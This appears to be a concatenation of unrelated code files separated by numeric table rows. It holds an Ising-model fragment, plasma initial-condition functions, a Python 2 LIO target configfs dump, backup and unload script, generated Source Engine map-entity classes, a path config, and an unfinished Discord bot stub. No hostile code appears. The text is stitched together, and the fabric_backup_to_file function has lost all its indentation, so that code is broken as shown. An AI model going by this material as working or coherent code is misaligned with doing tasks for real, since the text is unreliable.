            mag = config.magnetization()
            en = self.energy(spins)
            weight = exp(-en / T)
            partition += weight
            e_sum += weight * en
            e2_sum += weight * en * en
            m_sum += weight * mag
            m2_sum += weight * mag * mag
        e_avg = e_sum / partition
        e2_avg = e2_sum / partition
        m_avg = m_sum / partition
        m2_avg = m2_sum / partition
        # Fluctuation-dissipation relations for C and chi.
        heat_capacity = (e2_avg - e_avg ** 2) / (T * T)
        susceptibility = (m2_avg - m_avg ** 2) / (T)
        return e_avg, m_avg, heat_capacity, susceptibility
| 3,401 | 1,106 |
import numpy as np
def temperature(x):
    """Initial temperature profile — not implemented yet; always returns None."""
    return None
def density(x, L):
    """Initial density profile: the nonlinear Landau damping case.

    Alternative cases kept for reference (enable by swapping the return):
      weak Jeans instability:   1. + 0.01 * np.cos(0.8 * (x - 0.5 * L))
      strong Jeans instability: 1. + 0.01 * np.cos(0.1 * (x - 0.5 * L))
      linear Landau damping:    1. + 0.01 * np.cos(0.5 * (x - 0.5 * L))

    ``L`` (domain length) is unused by the active case but kept so all
    cases share one call signature.
    """
    return 1. + np.cos(0.5 * x)
def distribution(x, y):
    """Initial phase-space distribution f(x, y).

    A flat-top alternative kept for reference:
        f = 1. if -2. <= y <= 2. else 0.
    """
    return 1. + 0.5 * (np.cos(x + y * np.pi) - np.cos(x - y * np.pi))
| 618 | 290 |
#!/usr/bin/python
import os, sys, shutil
import subprocess as sub
import string
import re
import datetime, time
import optparse
target_root = "/sys/kernel/config/target/"
spec_root = "/var/target/fabric/"
def fabric_err(msg):
    # Print an error message to stderr and abort the script with exit code 1.
    print >> sys.stderr, msg
    sys.exit(1)
def fabric_configfs_dump(fabric_name, fabric_root, module_name):
    # Walk one fabric's configfs tree and print, to stdout, the shell commands
    # (modprobe / mkdir / echo / ln -s) that would recreate the currently
    # running configuration.  The output is meant to be saved and replayed
    # as a start-up script.
    if not os.path.isdir(fabric_root):
        print "Unable to access fabric_root: " + fabric_root
        sys.exit(1)
    iqn_root = os.listdir(fabric_root)
    # This will load up the fabric module
    print "modprobe " + module_name
    print "mkdir " + fabric_root
    # print "#### " + fabric_name + " Discovery authentication information"
    # Dump non-blank discovery-auth attributes (authenticate_target is
    # read-only and skipped).
    auth_dir = fabric_root + "/discovery_auth"
    if os.path.isdir(auth_dir) == True:
        for auth in os.listdir(auth_dir):
            if auth == "authenticate_target":
                continue
            auth_file = auth_dir + "/" + auth
            p = os.open(auth_file, 0)
            value = os.read(p, 256)
            ret = value.isspace()
            if ret:
                os.close(p)
                continue
            print "echo -n " + value.rstrip() + " > " + auth_file
            os.close(p)
    iqn_root = os.listdir(fabric_root)
    # Loop through LIO-Target IQN list
    for iqn in iqn_root:
        if not os.path.isdir(fabric_root + "/" + iqn):
            continue
        if iqn == "lio_version":
            continue
        if iqn == "discovery_auth":
            continue
        # Loop through LIO-Target IQN+TPGT list
        tpg_root = os.listdir(fabric_root + "/" + iqn);
        for tpgt_tmp in tpg_root:
            if tpgt_tmp == "fabric_statistics":
                continue
            # Directory names look like "tpgt_<N>"; keep the numeric part.
            tpgt_tmp2 = tpgt_tmp.split('_')
            tpgt = tpgt_tmp2[1]
            # print "#### Network portals for iSCSI Target Portal Group"
            # np_root = os.listdir(fabric_root + "/" + iqn + "/tpgt_" + tpgt + "/np")
            # for np in np_root:
            #     print "mkdir -p " + fabric_root + "/" + iqn + "/tpgt_" + tpgt + "/np/" + np
            # Dump Nexus attribute (when available)
            nexus_file = fabric_root + "/" + iqn + "/tpgt_" + tpgt + "/nexus"
            if os.path.isfile(nexus_file):
                print "mkdir -p " + fabric_root + "/" + iqn + "/tpgt_" + tpgt
                p = os.open(nexus_file, 0)
                value = os.read(p, 256)
                print "echo " + value.rstrip() + " > " + nexus_file
                os.close(p)
            print "#### " + fabric_name + " Target Ports"
            lun_root = os.listdir(fabric_root + "/" + iqn + "/tpgt_" + tpgt + "/lun")
            for lun_tmp in lun_root:
                lun_tmp2 = lun_tmp.split('_')
                lun = lun_tmp2[1]
                lun_dir = fabric_root + "/" + iqn + "/tpgt_" + tpgt + "/lun/lun_" + lun
                print "mkdir -p " + lun_dir
                # Recreate the symlinks from the LUN directory to its backing
                # device, skipping the ALUA attribute files.
                port_root = os.listdir(lun_dir)
                for port in port_root:
                    if port == "alua_tg_pt_gp":
                        continue
                    if port == "alua_tg_pt_offline":
                        continue
                    if port == "alua_tg_pt_status":
                        continue
                    if port == "alua_tg_pt_write_md":
                        continue
                    if not os.path.islink(lun_dir + "/" + port):
                        continue
                    port_link = fabric_root + "/" + iqn + "/tpgt_" + tpgt + "/lun/lun_" + lun + "/" + port
                    sourcelink = os.readlink(port_link)
                    sourcelink2 = os.path.join(os.path.dirname(port_link), sourcelink)
                    print "ln -s " + sourcelink2 + " " + port_link
                # Dump ALUA Target Port Group
                tg_pt_gp_file = lun_dir + "/alua_tg_pt_gp"
                p = os.open(tg_pt_gp_file, 0)
                try:
                    value = os.read(p, 512)
                except:
                    os.close(p)
                    continue
                os.close(p)
                if value:
                    # First line looks like "...Alias: <name>"; extract <name>.
                    tg_pt_gp_tmp = value.split('\n')
                    tg_pt_gp_out = tg_pt_gp_tmp[0]
                    off = tg_pt_gp_out.index('Alias: ')
                    off += 7 # Skip over "Alias: "
                    tg_pt_gp_name = tg_pt_gp_out[off:]
                    # Only need to dump if LIO-Target Port is NOT partof
                    # the 'default_tg_pt_gp'
                    if not re.search(tg_pt_gp_name, 'default_tg_pt_gp'):
                        print "#### ALUA Target Port Group"
                        print "echo " + tg_pt_gp_name + " > " + tg_pt_gp_file
                        #FIXME: --aluasecmd support
                        # print "lio_node --aluasecmd " + iqn + " " + tpgt + " " + lun
            # Dump values of iscsi/iqn/tpgt/attrib/
            print "#### Attributes for " + fabric_name + " Target Portal Group"
            attrib_dir = fabric_root + "/" + iqn + "/tpgt_" + tpgt + "/attrib/"
            attrib_root = os.listdir(attrib_dir)
            for attrib in attrib_root:
                attrib_file = attrib_dir + attrib
                p = os.open(attrib_file, 0)
                value = os.read(p, 16)
                print "echo " + value.rstrip() + " > " + attrib_file
                os.close(p)
            # Dump values for iscsi/iqn/tpgt/param
            print "#### Parameters for " + fabric_name + " Target Portal Group"
            param_dir = fabric_root + "/" + iqn + "/tpgt_" + tpgt + "/param/"
            param_root = os.listdir(param_dir)
            for param in param_root:
                param_file = param_dir + param
                p = os.open(param_file, 0)
                value = os.read(p, 256)
                print "echo \"" + value.rstrip() + "\" > " + param_file
                os.close(p)
            # TPGs that expose a nexus attribute carry no ACL tree to dump.
            if os.path.isfile(nexus_file):
                continue
            # Dump fabric Initiator Node ACLs from fabric_root/$WWN/tpgt_$TPGT/acls/
            print "#### " + fabric_name + " Initiator ACLs for " + fabric_name + " Target Portal Group"
            nacl_dir = fabric_root + "/" + iqn + "/tpgt_" + tpgt + "/acls/"
            nacl_root = os.listdir(nacl_dir)
            for nacl in nacl_root:
                print "mkdir -p " + nacl_dir + nacl
                # Dump fabric Initiator ACL authentication info from fabric_root/$WWN/tpgt_$TPGT/acls//$INITIATOR/auth
                print "#### " + fabric_name + " Initiator ACL authentication information"
                auth_dir = nacl_dir + nacl + "/auth"
                for auth in os.listdir(auth_dir):
                    if auth == "authenticate_target":
                        continue
                    auth_file = auth_dir + "/" + auth
                    p = os.open(auth_file, 0)
                    value = os.read(p, 256)
                    ret = value.isspace()
                    if ret:
                        os.close(p)
                        continue
                    print "echo -n " + value.rstrip() + " > " + auth_file
                    os.close(p)
                # Dump fabric Initiator ACL TPG attributes from fabric_root/$WWN/tpgt_$TPGT/acls/$INITIATOR/attrib
                print "#### " + fabric_name + " Initiator ACL TPG attributes"
                nacl_attrib_dir = nacl_dir + nacl + "/attrib"
                for nacl_attrib in os.listdir(nacl_attrib_dir):
                    nacl_attrib_file = nacl_attrib_dir + "/" + nacl_attrib
                    p = os.open(nacl_attrib_file, 0)
                    value = os.read(p, 8)
                    print "echo " + value.rstrip() + " > " + nacl_attrib_file
                    os.close(p)
                # Dump fabric Initiator LUN ACLs from fabric_root/$WWN/tpgt_$TPGT//acls/$INITIATOR/lun
                print "#### " + fabric_name + " Initiator LUN ACLs for iSCSI Target Portal Group"
                lun_acl_dir = nacl_dir + nacl
                for lun_acl in os.listdir(lun_acl_dir):
                    # Only "lun_*" entries are mapped-LUN directories.
                    ret = re.search('lun_', lun_acl)
                    if not ret:
                        continue
                    lun_link_dir = nacl_dir + nacl + "/" + lun_acl
                    print "mkdir -p " + lun_link_dir
                    for lun_acl_link in os.listdir(lun_link_dir):
                        if lun_acl_link == "write_protect":
                            p = os.open(lun_link_dir + "/write_protect", 0)
                            value = os.read(p, 4)
                            print "echo " + value.rstrip() + " > " + lun_link_dir + "/write_protect"
                            os.close(p)
                            continue
                        if not os.path.islink(lun_link_dir + "/" + lun_acl_link):
                            continue
                        sourcelink = os.readlink(lun_link_dir + "/" + lun_acl_link)
                        sourcelink2 = os.path.join(os.path.dirname(lun_link_dir + "/" + lun_acl_link), sourcelink)
                        print "ln -s " + sourcelink2 + " " + lun_link_dir + "/" + lun_acl_link
            # Dump value of fabric_root/$WWN/tpgt_$TPGT//enable
            print "#### Trigger to enable " + fabric_name + " Target Portal Group"
            enable_file = fabric_root + "/" + iqn + "/tpgt_" + tpgt + "/enable"
            if os.path.isfile(enable_file):
                p = os.open(enable_file, 0)
                value = os.read(p, 1)
                print "echo " + value.rstrip() + " > " + enable_file
                os.close(p)
    return
def fabric_configfs_dump_all():
    """Dump recreate-commands for every fabric under target_root.

    Skips the non-fabric entries 'version' and 'core', and 'iscsi'
    (FIXME: currently handled via lio_dump --stdout instead).
    """
    for fabric_name in os.listdir(target_root):
        if fabric_name == "version" or fabric_name == "core":
            continue
        if fabric_name == "iscsi":  # FIXME: currently using lio_dump --stdout
            continue
        fabric_root = target_root + fabric_name
        module_name = fabric_get_module_name(fabric_name)
        fabric_configfs_dump(fabric_name, fabric_root, module_name)
    return
def fabric_backup_to_file(date_time, fabric_name, fabric_root, module_name):
now = date_time
if not os.path.isdir(fabric_root):
print "Unable to access fabric_root: " + fabric_root
sys.exit(1)
current_dir = "/etc/target"
backup_dir = "/etc/target/backup"
if not os.path.isdir(backup_dir):
op = "mkdir " + backup_dir
ret = os.system(op)
if ret:
print "Unable to open backup_dir"
sys.exit(1)
op = "tcm_fabric --stdout --fabric-name=" + fabric_name + " --fabric-root=" + fabric_root + " --module-name=" + module_name
# print "Using op: " + op
p = sub.Popen(op, shell=True, stdout=sub.PIPE).stdout
if not p:
print "Unable to dump " + fabric_name + "/ConfigFS running state"
sys.exit(1)
orig_file = current_dir + "/" + fabric_name + "_start.sh"
print "Making backup of " + fabric_name + "/ConfigFS with timestamp: " + now
backup_file = backup_dir + "/" + fabric_name + "_backup-" + now + ".sh"
if os.path.isfile(backup_file):
print "" + fabric_name + " backup_file: " + backup_file + "already exists, exiting"
p.close()
sys.exit(1)
back = open(backup_file, 'w')
line = p.readline()
while line:
print >>back, line.rstrip()
line = p.readline()
p.close()
back.close()
ret = shutil.copyfile(backup_file, orig_file)
if ret:
print "Unable to copy " + back_file
sys.exit(1)
print "Successfully updated default config " + orig_file
return backup_file
def fabric_backup_to_file_all(date_time):
    # Back up every fabric under target_root to a timestamped script,
    # skipping the non-fabric entries and iscsi (handled by lio_dump).
    if not os.path.isdir(target_root):
        print "Unable to open target_root: " + target_root
        sys.exit(1)
    for fabric_name in os.listdir(target_root):
        if fabric_name == "version":
            continue
        if fabric_name == "core":
            continue
        # FIXME: currently using lio_dump
        if fabric_name == "iscsi":
            continue
        fabric_root = target_root + fabric_name
        module_name = fabric_get_module_name(fabric_name)
        fabric_backup_to_file(date_time, fabric_name, fabric_root, module_name)
    return
def fabric_unload(fabric_name, fabric_root, module_name):
    # Tear down one fabric's configfs tree bottom-up (mapped LUN links,
    # node ACLs, LUN links, TPG dirs, WWN dirs, then the fabric root) and
    # finally rmmod its kernel module.  Errors are reported but do not stop
    # the teardown.
    if not os.path.isdir(fabric_root):
        print "Unable to access fabric_root: " + fabric_root
        sys.exit(1)
    wwn_root = os.listdir(fabric_root)
    for wwn in wwn_root:
        if not os.path.isdir(fabric_root + "/" + wwn):
            continue
        if wwn == "discovery_auth":
            continue
        tpg_root = fabric_root + "/" + wwn
        for tpgt_tmp in os.listdir(tpg_root):
            if tpgt_tmp == "fabric_statistics":
                continue
            # Directory names look like "tpgt_<N>"; keep the numeric part.
            tpgt_tmp2 = tpgt_tmp.split('_')
            tpgt = tpgt_tmp2[1]
            # Disable the TPG first so teardown of its children succeeds.
            if os.path.isfile(fabric_root + "/" + wwn + "/tpgt_" + tpgt + "/enable"):
                disable_op = "echo 0 > " + fabric_root + "/" + wwn + "/tpgt_" + tpgt + "/enable"
                ret = os.system(disable_op)
                if ret:
                    print "Unable to disable TPG: " + wwn + " TPGT: " + tpgt
            nacl_root = fabric_root + "/" + wwn + "/tpgt_" + tpgt + "/acls"
            for nacl in os.listdir(nacl_root):
                lun_acl_root = nacl_root + "/" + nacl + "/"
                for lun_acl in os.listdir(lun_acl_root):
                    # Only "lun_*" entries are mapped-LUN directories.
                    ret = re.search('lun_', lun_acl)
                    if not ret:
                        continue
                    mapped_lun = lun_acl[4:]
                    lun_link_dir = lun_acl_root + "/" + lun_acl + "/"
                    for lun_acl_link in os.listdir(lun_link_dir):
                        if lun_acl_link == "write_protect":
                            continue
                        if os.path.islink(lun_link_dir + "/" + lun_acl_link):
                            unlink_op = lun_link_dir + "/" + lun_acl_link
                            ret = os.unlink(unlink_op)
                            if ret:
                                print "Unable to unlink MappedLUN: " + lun_link_dir + "/" + lun_acl_link
                    dellunacl_op = "rmdir " + lun_link_dir
                    ret = os.system(dellunacl_op)
                    if ret:
                        print "Unable to rmdir fabric mapped_lun"
                delnodeacl_op = "rmdir " + nacl_root + "/" + nacl + "/"
                ret = os.system(delnodeacl_op)
                if ret:
                    print "Unable to remove NodeACL: " + nacl_root + "/" + nacl + "/"
            lun_root = fabric_root + "/" + wwn + "/tpgt_" + tpgt + "/lun"
            for lun_tmp in os.listdir(lun_root):
                lun_tmp2 = lun_tmp.split('_')
                lun = lun_tmp2[1]
                lun_dir = lun_root + "/lun_" + lun
                # Drop the port symlinks before removing the LUN directory.
                for port in os.listdir(lun_dir):
                    if not os.path.islink(lun_dir + "/" + port):
                        continue
                    unlink_op = lun_dir + "/" + port
                    ret = os.unlink(unlink_op)
                    if ret:
                        print "Unable to unlink fabric port/lun"
                rmdir_op= "rmdir " + lun_dir
                ret = os.system(rmdir_op);
                if ret:
                    print "Unable to rmdir fabric port/lun: " + lun_dir
            rmdir_op = "rmdir " + fabric_root + "/" + wwn + "/tpgt_" + tpgt + "/"
            ret = os.system(rmdir_op)
            if ret:
                print "Unable to rmdir fabric tpg: " + fabric_root + "/" + wwn + "/tpgt_" + tpgt + "/"
        rmdir_op = "rmdir " + fabric_root + "/" + wwn + "/"
        ret = os.system(rmdir_op)
        if ret:
            print "Unable to rmdir fabric wwn: " + fabric_root + "/" + wwn + "/"
    rmdir_op = "rmdir " + fabric_root
    ret = os.system(rmdir_op)
    if ret:
        print "Unable to release fabric_root: " + fabric_root
    rmmod_op = "rmmod " + module_name
    ret = os.system(rmmod_op)
    if ret:
        print "Unable to unload " + module_name
    print "Successfully released fabric: " + fabric_root
    return
def fabric_get_module_name(fabric_name):
    # Look up the kernel module for a fabric by scanning the spec files in
    # spec_root for a "kernel_module = <name>" line.  Returns the module
    # name, or "" when no matching spec file declares one.
    kernel_module = ""
    for specs in os.listdir(spec_root):
        if specs == "README":
            continue
        # Match "<fabric>.spec", "tcm_<fabric>.spec", or any name containing
        # the fabric name.
        if not re.search(fabric_name + ".spec", specs) and not re.search("tcm_" + fabric_name + ".spec", specs) and not re.search(fabric_name, specs):
            continue
        op = "cat " + spec_root + specs
        p = sub.Popen(op, shell=True, stdout=sub.PIPE).stdout
        if not p:
            print "Unable to dump " + fabric_name + "/ConfigFS running state"
            sys.exit(1)
        line = p.readline()
        while line:
            tmp = line.rstrip()
            # Check for 'kernel_module' line in $FABRIC.spec
            if re.search('kernel_module', tmp):
                tmp_list = tmp.split('= ')
                p.close()
                return tmp_list[1]
            line = p.readline()
        p.close()
    return kernel_module
def fabric_unloadall():
    # Unload every fabric under target_root except the non-fabric entries
    # and iscsi (handled by lio_node --unload).  A missing target_root
    # (errno 2) usually means the target kernel module is not loaded.
    module_name = ""
    try:
        for fabric_name in os.listdir(target_root):
            if fabric_name == "version":
                continue
            if fabric_name == "core":
                continue
            # FIXME: currently using lio_node --unload
            if fabric_name == "iscsi":
                continue
            fabric_root = target_root + fabric_name
            module_name = fabric_get_module_name(fabric_name)
            #print "fabric_get_module_name() using: " + module_name
            # Skip fabrics whose kernel module cannot be determined.
            if module_name == "":
                continue
            fabric_unload(fabric_name, fabric_root, module_name)
    except OSError, (errno, strerror):
        if errno == 2:
            fabric_err("%s %s\n%s" % (target_root, strerror, "Is kernel module loaded?") )
def do_work(stdout_enable, stdout_enable_all, date_time, unload, unloadall, fabric_name, fabric_root, module_name):
    """Dispatch exactly one action based on which option string is not "None".

    Every argument arrives as str(option-value), so an unset optparse
    option is the literal string "None".  Always returns 0.
    """
    if stdout_enable != "None":
        fabric_configfs_dump(fabric_name, fabric_root, module_name)
    elif stdout_enable_all != "None":
        fabric_configfs_dump_all()
    elif date_time != "None":
        fabric_backup_to_file(date_time, fabric_name, fabric_root, module_name)
    elif unload != "None":
        fabric_unload(fabric_name, fabric_root, module_name)
    elif unloadall != "None":
        fabric_unloadall()
    return 0
def main():
    """Parse the command line and hand the selected action to do_work()."""
    parser_fabric = optparse.OptionParser()
    # (flags, kwargs) for every option; all are action='store', type='string'.
    # nargs=0 options are pure switches whose presence is detected later by
    # comparing str(value) against "None".
    option_specs = [
        (("--s", "--stdout"),
         dict(dest='stdout_enable', nargs=0,
              help="Dump running Fabric/ConfigFS syntax to STDOUT")),
        (("--z", "--stdoutall"),
         dict(dest='stdout_enable_all', nargs=0,
              help="Dump all running Fabric/ConfigFS syntax to STDOUT")),
        (("--t", "--tofile"),
         dict(dest="date_time", nargs=1,
              help="Backup running Fabric/ConfigFS syntax to /etc/target/backup/fabricname_backup-<DATE_TIME>.sh")),
        (("--u", "--unload"),
         dict(dest="unload", nargs=0,
              help="Unload running Fabric/ConfigFS")),
        (("--a", "--unloadall"),
         dict(dest="unloadall", nargs=0,
              help="Unload all running Fabric/ConfigFS")),
        (("--f", "--fabric-name"),
         dict(dest='fabric_name', nargs=1, help="Target fabric name")),
        (("--r", "--fabric-root"),
         dict(dest='fabric_root', nargs=1, help="Target fabric configfs root")),
        (("--m", "--module-name"),
         dict(dest='module_name', nargs=1, help="Target fabric module name ")),
    ]
    for flags, kwargs in option_specs:
        parser_fabric.add_option(*flags, action='store', type='string', **kwargs)
    (opts_fabric, args_fabric) = parser_fabric.parse_args()
    # --f/--r/--m are mandatory unless one of the whole-tree actions
    # (--a/--s/--z/--t) was requested.
    for key in ('fabric_name', 'fabric_root', 'module_name'):
        if getattr(opts_fabric, key):
            continue
        action_values = [str(getattr(opts_fabric, name))
                         for name in ('unloadall', 'stdout_enable', 'stdout_enable_all', 'date_time')]
        if all(value == "None" for value in action_values):
            print("mandatory option is missing\n")
            parser_fabric.print_help()
            exit(-1)
    do_work(str(opts_fabric.stdout_enable), str(opts_fabric.stdout_enable_all),
            str(opts_fabric.date_time), str(opts_fabric.unload), str(opts_fabric.unloadall),
            str(opts_fabric.fabric_name), str(opts_fabric.fabric_root),
            str(opts_fabric.module_name))
# Run only when executed directly, not when imported as a module.
if __name__ == "__main__":
    main()
| 17,866 | 7,805 |
"""
Helper classes for creating maps in any Source Engine game that uses hl2mp.fgd.
This file was auto-generated by import_fgd.py on 2020-01-19 09:11:14.977620.
"""
from vmflib2.vmf import *
class FilterActivatorTeam(Entity):
    """filter_activator_team: passes or blocks activators by team.

    Auto-generated from hl2mp.fgd, line 30.
    """
    def __init__(self, vmf_map: "ValveMap", origin: "Origin"="0 0 0", targetname: str="", Negated="Allow entities that match criteria", filterteam=2):
        Entity.__init__(self, "filter_activator_team", vmf_map)
        self.origin: "Origin" = origin        # location in 3D space
        self.targetname: str = targetname     # name other entities refer to this one by
        self.Negated = Negated                # filter mode: Allow -> only matching entities pass
        self.filterteam = filterteam          # team number to filter on
        self.auto_properties += ["origin", "targetname", "Negated", "filterteam"]
class InfoPlayerCombine(Entity):
    """info_player_combine: a Combine-team spawn point (position + facing).

    Auto-generated from hl2mp.fgd, line 17.  Any number may be placed in a map.
    """
    def __init__(self, vmf_map: "ValveMap", origin: "Origin"="0 0 0", angles: "Origin"="0 0 0"):
        Entity.__init__(self, "info_player_combine", vmf_map)
        self.origin: "Origin" = origin   # location in 3D space
        self.angles: "Origin" = angles   # orientation as Pitch Yaw Roll (Y Z X)
        self.auto_properties += ["origin", "angles"]
class InfoPlayerDeathmatch(Entity):
    """info_player_deathmatch: a deathmatch spawn point (position + facing).

    Auto-generated from hl2mp.fgd, line 10.  Any number may be placed in a map.
    """
    def __init__(self, vmf_map: "ValveMap", origin: "Origin"="0 0 0", angles: "Origin"="0 0 0"):
        Entity.__init__(self, "info_player_deathmatch", vmf_map)
        self.origin: "Origin" = origin   # location in 3D space
        self.angles: "Origin" = angles   # orientation as Pitch Yaw Roll (Y Z X)
        self.auto_properties += ["origin", "angles"]
class InfoPlayerRebel(Entity):
    """info_player_rebel: a Rebel-team spawn point (position + facing).

    Auto-generated from hl2mp.fgd, line 24.  Any number may be placed in a map.
    """
    def __init__(self, vmf_map: "ValveMap", origin: "Origin"="0 0 0", angles: "Origin"="0 0 0"):
        Entity.__init__(self, "info_player_rebel", vmf_map)
        self.origin: "Origin" = origin   # location in 3D space
        self.angles: "Origin" = angles   # orientation as Pitch Yaw Roll (Y Z X)
        self.auto_properties += ["origin", "angles"]
class PropPhysicsRespawnable(Entity):
    """
    Auto-generated from hl2mp.fgd, line 43.
    This class is the same as prop_physics, except it respawns after it breaks.

    Every keyword argument maps one-to-one onto a VMF key of the same name;
    all of them are registered in ``auto_properties`` so the map writer
    serializes them automatically.  Note some numeric defaults are the
    string forms carried over from the FGD (e.g. modelscale="1.0").
    """
    def __init__(self, vmf_map: "ValveMap", origin: "Origin"="0 0 0", globalname: str="", angles: "Origin"="0 0 0", model: str="", skin: int=0, modelscale: float="1.0", targetname: str="", damagefilter: str="", disableshadows=0, ExplodeDamage: float=0, ExplodeRadius: float=0, PerformanceMode=0, BreakModelMessage: str="", pressuredelay: float=0, mindxlevel=0, maxdxlevel=0, fademindist: float=-1, fademaxdist: float=0, fadescale: float=1, spawnflags="", minhealthdmg: int=0, shadowcastdist: int=0, physdamagescale: float="0.1", Damagetype=0, nodamageforces=0, inertiaScale: float="1.0", massScale: float="0", overridescript: str="", damagetoenablemotion: int=0, forcetoenablemotion: float=0, puntsound: str="", renderfx=0, rendermode=0, renderamt: int=255, rendercolor: "RGB"="255 255 255", disablereceiveshadows=0, RespawnTime: float=60):
        Entity.__init__(self, "prop_physics_respawnable", vmf_map)
        # Origin : This entity's location in 3D space.
        self.origin: "Origin" = origin
        # Global Entity Name : Name by which this entity is linked to another entity in a different map. When the player transitions to a new map, entities in the new map with globalnames matching entities in the previous map will have the previous map's state copied over their state.
        self.globalname: str = globalname
        # Pitch Yaw Roll (Y Z X) : This entity's orientation in the world. Pitch is rotation around the Y axis,
        self.angles: "Origin" = angles
        # World Model :
        self.model: str = model
        # Skin : Some models have multiple versions of their textures, called skins. Set this to a number other than 0 to use that skin instead of the default.
        self.skin: int = skin
        # Model Scale : A multiplier for the size of the model.
        self.modelscale: float = modelscale
        # Name : The name that other entities refer to this entity by.
        self.targetname: str = targetname
        # Damage Filter : Name of the filter entity that controls which entities can damage us.
        self.damagefilter: str = damagefilter
        # Disable shadows :
        self.disableshadows = disableshadows
        # Explosion Damage : If non-zero, when this entity breaks it will create an explosion that causes the specified amount of damage. See also 'Explosion Radius'.
        self.ExplodeDamage: float = ExplodeDamage
        # Explosion Radius : If non-zero, when this entity breaks it will create an explosion with a radius of the specified amount. See also 'Explosion Damage'.
        self.ExplodeRadius: float = ExplodeRadius
        # Performance Mode : Used to limit the amount of gibs produced when this entity breaks, for performance reasons.
        self.PerformanceMode = PerformanceMode
        # Break Model Message : If set, will use this break model message instead of the normal break behavior.
        self.BreakModelMessage: str = BreakModelMessage
        # Pressure Delay : Delay, in seconds, after 'broken' by pressure before breaking apart (allows for sound to play before breaking apart).
        self.pressuredelay: float = pressuredelay
        # Minimum DX Level :
        self.mindxlevel = mindxlevel
        # Maximum DX Level :
        self.maxdxlevel = maxdxlevel
        # Start Fade Dist : Distance at which the prop starts to fade (<0 = use fademaxdist).
        self.fademindist: float = fademindist
        # End Fade Dist : Max fade distance at which the prop is visible (0 = don't fade out)
        self.fademaxdist: float = fademaxdist
        # Fade Scale : If you specify a fade in the worldspawn, or if the engine is running under dx7, then the engine will forcibly fade out props even if fademindist/fademaxdist isn't specified.
        self.fadescale: float = fadescale
        # TODO: Replace this filler. :
        self.spawnflags = spawnflags
        # Min Damage to Hurt : The prop will ignore any damage events if the damage is less than this amount.
        self.minhealthdmg: int = minhealthdmg
        # Shadow Cast Distance : Use this to override how far this object casts shadows. 0 = default distance.
        self.shadowcastdist: int = shadowcastdist
        # Physics Impact Damage Scale : Scales damage energy when this object is hit by a physics object. NOTE: 0 means this feature is disabled for backwards compatibility.\nSet to 1.0 for materials as strong as flesh, smaller numbers indicate stronger materials.
        self.physdamagescale: float = physdamagescale
        # Impact damage type :
        self.Damagetype = Damagetype
        # Damaging it Doesn't Push It : Used to determine whether or not damage should cause the brush to move.
        self.nodamageforces = nodamageforces
        # Scale Factor For Inertia : Scales the angular mass of an object. Used to hack angular damage and collision response.
        self.inertiaScale: float = inertiaScale
        # Mass Scale : A scale multiplier for the object's mass.
        self.massScale: float = massScale
        # Override Parameters : A list of physics key/value pairs that are usually in a physics prop .qc file. Format is 'key,value,key,value,etc'.
        self.overridescript: str = overridescript
        # Health Level to Override Motion : If specified, this object will start motion disabled. Once its health has dropped below this specified amount, it will enable motion.
        self.damagetoenablemotion: int = damagetoenablemotion
        # Physics Impact Force to Override Motion : If specified, this object will start motion disabled. Any impact that imparts a force greater than this value on the physbox will enable motion.
        self.forcetoenablemotion: float = forcetoenablemotion
        # Sound to make when punted :
        self.puntsound: str = puntsound
        # Render FX :
        self.renderfx = renderfx
        # Render Mode : Used to set a non-standard rendering mode on this entity. See also 'FX Amount' and 'FX Color'.
        self.rendermode = rendermode
        # FX Amount (0 - 255) : The FX amount is used by the selected Render Mode.
        self.renderamt: int = renderamt
        # FX Color (R G B) : The FX color is used by the selected Render Mode.
        self.rendercolor: "RGB" = rendercolor
        # Disable Receiving Shadows :
        self.disablereceiveshadows = disablereceiveshadows
        # Respawn Time : Ammount in seconds this prop will respawn after it breaks.
        self.RespawnTime: float = RespawnTime
        # Register every key above for automatic VMF serialization.
        self.auto_properties.extend(["origin", "globalname", "angles", "model", "skin", "modelscale", "targetname", "damagefilter", "disableshadows", "ExplodeDamage", "ExplodeRadius", "PerformanceMode", "BreakModelMessage", "pressuredelay", "mindxlevel", "maxdxlevel", "fademindist", "fademaxdist", "fadescale", "spawnflags", "minhealthdmg", "shadowcastdist", "physdamagescale", "Damagetype", "nodamageforces", "inertiaScale", "massScale", "overridescript", "damagetoenablemotion", "forcetoenablemotion", "puntsound", "renderfx", "rendermode", "renderamt", "rendercolor", "disablereceiveshadows", "RespawnTime"])
class WeaponSlam(Entity):
"""
Auto-generated from hl2mp.fgd, line 50.
S.L.A.M. - Selectable Lightweight Attack Munition
"""
def __init__(self, vmf_map: "ValveMap", origin: "Origin"="0 0 0", targetname: str="", angles: "Origin"="0 0 0", spawnflags="", fademindist: float=-1, fademaxdist: float=0, fadescale: float=1):
Entity.__init__(self, "weapon_slam", vmf_map)
# Origin : This entity's location in 3D space.
self.origin: "Origin" = origin
# Name : The name that other entities refer to this entity by.
self.targetname: str = targetname
# Pitch Yaw Roll (Y Z X) : This entity's orientation in the world. Pitch is rotation around the Y axis,
self.angles: "Origin" = angles
# TODO: Replace this filler. :
self.spawnflags = spawnflags
# Start Fade Dist/Pixels : Distance at which the prop starts to fade (<0 = use fademaxdist). If 'Screen Space Fade' is selected, this represents the number of pixels wide covered by the prop when it starts to fade.
self.fademindist: float = fademindist
# End Fade Dist/Pixels : Maximum distance at which the prop is visible (0 = don't fade out). If 'Screen Space Fade' is selected, this represents the *minimum* number of pixels wide covered by the prop when it fades.
self.fademaxdist: float = fademaxdist
# Fade Scale : If you specify a fade in the worldspawn, or if the engine is running under dx7, then the engine will forcibly fade out props even if fademindist/fademaxdist isn't specified.
self.fadescale: float = fadescale
self.auto_properties.extend(["origin", "targetname", "angles", "spawnflags", "fademindist", "fademaxdist", "fadescale"])
| 12,321 | 3,687 |
import os

# Filesystem layout of the application, resolved relative to this package.
BASE_DIR = os.path.dirname(__file__)


def _abs_path(*segments):
    """Join *segments* and normalise the result to an absolute path."""
    return os.path.abspath(os.path.join(*segments))


__config__ = _abs_path(BASE_DIR, "../config.cfg")   # main configuration file
__template__ = _abs_path(BASE_DIR, "templates")     # HTML templates
__static__ = _abs_path(BASE_DIR, "static")          # static assets
__upload__ = _abs_path(__static__, "uploads")       # user-uploaded files
| 317 | 128 |
import nextcord
from nextcord.ext import commands
import json
import os
import pymongo
import os
from keep_alive import keep_alive
# Set environment variables
# os.environ['info'] = "test:pass123"
# os.environ['TOKEN'] = "MY-AWSOME-TOKEN"
# Request every gateway intent; the bot token is read from the environment
# (never hard-code it in source).
intents = nextcord.Intents.all()
TOKEN = os.environ['TOKEN']
async def prefix_d(_, message):
    """Resolve the command prefix for the guild a message came from.

    Looks up the per-guild prefix stored in the shared Mongo document
